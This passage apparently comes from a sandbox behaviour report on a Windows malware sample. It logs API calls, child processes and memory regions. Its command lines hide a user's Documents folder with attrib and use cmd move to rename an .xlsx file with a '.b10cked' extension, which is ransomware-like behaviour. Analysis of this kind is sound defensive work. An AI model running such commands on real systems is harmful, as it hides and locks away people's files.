lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0130.162] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0130.162] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x26edb0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x26edfc | out: lpCommandLine="attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\"", lpProcessInformation=0x26edfc*(hProcess=0x50, hThread=0x4c, dwProcessId=0x46c, dwThreadId=0x4b0)) returned 1 [0130.164] CloseHandle (hObject=0x4c) returned 1 [0130.164] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0130.164] GetEnvironmentStringsW () returned 0x383628* [0130.164] FreeEnvironmentStringsW (penv=0x383628) returned 1 [0130.164] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0130.369] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x26ecf0 | out: lpExitCode=0x26ecf0*=0x0) returned 1 [0130.369] CloseHandle (hObject=0x50) returned 1 [0130.369] _vsnwprintf (in: _Buffer=0x26ee38, _BufferCount=0x13, _Format="%08X", _ArgList=0x26ecfc | out: _Buffer="00000000") returned 8 [0130.369] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0130.369] GetEnvironmentStringsW () returned 0x383628* [0130.370] FreeEnvironmentStringsW (penv=0x383628) returned 1 [0130.370] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0130.370] GetEnvironmentStringsW () returned 0x383628* [0130.370] FreeEnvironmentStringsW (penv=0x383628) returned 1 [0130.370] DeleteProcThreadAttributeList (in: lpAttributeList=0x26ed54 | out: lpAttributeList=0x26ed54) [0130.370] _get_osfhandle (_FileHandle=1) returned 0x7 [0130.370] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0130.370] _get_osfhandle (_FileHandle=1) returned 0x7 [0130.370] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0130.370] _get_osfhandle (_FileHandle=0) returned 0x3 [0130.370] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0130.370] SetConsoleInputExeNameW () returned 0x1 [0130.370] GetConsoleOutputCP () returned 0x1b5 [0130.371] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0130.371] SetThreadUILanguage (LangId=0x0) returned 0x409 [0130.371] exit (_Code=0) Process: id = "95" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16880" os_pid = "0x6dc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "94" os_parent_pid = "0x8d4" cmd_line = "attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 11263 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 11264 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 11265 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 11266 start_va = 0x110000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 11267 start_va = 0xd30000 end_va = 0xd36fff entry_point = 0xd30000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 11268 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 11269 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 11270 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 11271 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 11272 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 11273 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 11274 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 11275 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 11276 start_va = 0x2b0000 end_va = 0x3affff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 11277 start_va = 0x530000 end_va = 0x53ffff entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 11278 start_va = 0x6e440000 end_va = 0x6e45cfff entry_point = 0x6e440000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 11279 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 11280 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 11281 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 11282 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 11283 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 11284 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 11285 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 11286 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 11287 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 11288 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 11289 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 11290 start_va = 0x150000 end_va = 0x217fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 11291 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 11292 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 152 os_tid = 0x140 Process: id = "96" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16380" os_pid = "0x5fc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "94" os_parent_pid = "0x8d4" cmd_line = "attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 11370 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 11371 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 11372 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 11373 start_va = 0x1f0000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 11374 start_va = 0x880000 end_va = 0x886fff entry_point = 0x880000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 11375 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 11376 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 11377 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 11378 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 11379 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 11380 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 11381 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 11382 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 11383 start_va = 0x370000 end_va = 0x37ffff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 11384 start_va = 0x410000 end_va = 0x50ffff entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 11385 start_va = 0x6e440000 end_va = 0x6e45cfff entry_point = 0x6e440000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 11386 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 11387 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 11388 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 11389 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 11390 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 11391 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 11392 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 11393 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 11394 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 11395 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 11396 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 11397 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 11398 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 11399 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 153 os_tid = 0xc4 Process: id = "97" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea168c0" os_pid = "0x46c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "94" os_parent_pid = "0x8d4" cmd_line = "attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 11452 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 11453 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 11454 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 11455 start_va = 0xd0000 end_va = 0x10ffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 11456 start_va = 0xa00000 end_va = 0xa06fff entry_point = 0xa00000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 11457 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 11458 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 11459 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 11460 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 11461 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 11462 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 11463 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 11464 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 11465 start_va = 0x200000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 11466 start_va = 0x270000 end_va = 0x36ffff entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 11467 start_va = 0x6e440000 end_va = 0x6e45cfff entry_point = 0x6e440000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 11468 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 11469 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 11470 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 11471 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 11472 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 11473 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 11474 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 11475 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 11476 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 11477 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 11478 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 11479 start_va = 0x110000 end_va = 0x1d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000110000" filename = "" Region: id = 11480 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 11481 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 154 os_tid = 0x4b0 Process: id = "98" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea168e0" os_pid = "0x53c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\BUW1GW~1.XLS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\bUW1gWS4k.xlsx.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 11558 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 11559 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 11560 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 11561 start_va = 0x170000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 11562 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 11563 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 11564 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 11565 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 11566 start_va = 0x7ffd4000 end_va = 0x7ffd4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 11567 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 11670 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 11671 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 11672 start_va = 0x70000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 11673 start_va = 0x270000 end_va = 0x2d6fff entry_point = 0x270000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 11674 start_va = 0x3d0000 end_va = 0x3dffff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 11675 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 11676 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 11677 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 11678 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 11679 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 11680 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 11681 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 11682 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 11683 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 11684 start_va = 0x2e0000 end_va = 0x3a7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002e0000" filename = "" Region: id = 11685 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 11686 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 11687 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 